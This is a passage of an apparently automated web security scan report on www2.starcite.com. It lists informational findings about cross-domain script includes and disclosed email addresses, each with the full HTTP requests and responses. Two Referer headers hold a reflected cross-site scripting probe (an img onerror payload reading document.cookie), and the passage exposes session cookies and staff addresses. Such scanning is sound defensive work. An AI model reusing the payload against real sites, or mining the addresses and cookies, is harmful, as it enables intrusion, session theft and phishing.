Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:20 GMT;path=/
Content-Length: 39463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="93" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.28. http://www2.starcite.com/starcite/sitemap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/sitemap

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/sitemap HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:17 GMT;path=/
Content-Length: 16966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.29. http://www2.starcite.com/starcite/solutions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/solutions HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=17
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:31 GMT;path=/
Content-Length: 13948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.30. http://www2.starcite.com/starcite/suppliers/howitworks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/suppliers/howitworks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/suppliers/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:12 GMT;path=/
Content-Length: 25233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.31. http://www2.starcite.com/starcite/themes/garland/views-list-plannerseventview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerseventview.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/themes/garland/views-list-plannerseventview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.32. http://www2.starcite.com/starcite/themes/garland/views-list-plannerswhitepaperview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-plannerswhitepaperview.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/themes/garland/views-list-plannerswhitepaperview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.33. http://www2.starcite.com/starcite/whatwedo/ourtechnology

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/ourtechnology

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/whatwedo/ourtechnology HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:50 GMT;path=/
Content-Length: 23419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.34. http://www2.starcite.com/starcite/whatwedo/overview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/overview

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/whatwedo/overview HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:21:56 GMT;path=/
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.35. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/starcitenetwork

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/whatwedo/starcitenetwork HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:51 GMT;path=/
Content-Length: 21350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

5. Email addresses disclosed
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


5.1. http://www2.starcite.com/starcite/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/ HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; expires=Tue, 25 Jan 2011 17:30:23 GMT; path=/; domain=.www2.starcite.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:30 GMT;path=/
Content-Length: 39548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
<a href="mailto:srosenlund@starcite.com">
...[SNIP]...

5.2. http://www2.starcite.com/starcite/customerlogin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customerlogin

Issue detail

The following email addresses were disclosed in the response:

Request

GET /starcite/customerlogin HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="/starcite/" title="Customer Support@starcite.com ">service@starcite.com</a>
...[SNIP]...

5.3. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="mailto:dchou@starcite.com">dchou@starcite.com</a>
...[SNIP]...

5.4. http://www2.starcite.com/starcite/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/home

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/home HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:59 GMT;path=/
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
<a href="mailto:srosenlund@starcite.com">
...[SNIP]...

5.5. http://www2.starcite.com/starcite/locations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/locations

Issue detail

The following email addresses were disclosed in the response:

Request

GET /starcite/locations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:00 GMT;path=/
Content-Length: 18662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<a href="mailto:info@starcite.com">info@StarCite.com</a>
...[SNIP]...
<a href="mailto:info@starcite.com">info@StarCite.com</a>
...[SNIP]...
<a href="mailto:europe@starcite.com">europe@StarCite.com</a>
...[SNIP]...
<a href="mailto:info@starcite.com">info@StarCite.com</a>
...[SNIP]...
<a href="mailto:sales@starcite.com">sales@starcite.com</a>
...[SNIP]...
<a href="mailto:service@starcite.com">service@starcite.com</a>
...[SNIP]...
<a href="mailto:rfpservice@starcite.com">rfpservice@starcite.com</a>
...[SNIP]...

5.6. http://www2.starcite.com/starcite/misc/forms.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/forms.css

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/misc/forms.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 16 Apr 2009 21:02:12 GMT
ETag: "3000000002388-a90-467b260cdaa1f"
Accept-Ranges: bytes
Content-Length: 2704
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/* ------------------------------------------------------

StarCite Forms
Dan Wilt, dan@enhancedinnovations.com

-------------------------------------------------------*/

/* ------------------------------------------------------
Custom Resets
-------------------------------------------------------*/

@
...[SNIP]...

5.7. http://www2.starcite.com/starcite/misc/jquery/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /starcite/misc/jquery/jquery.cookie.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
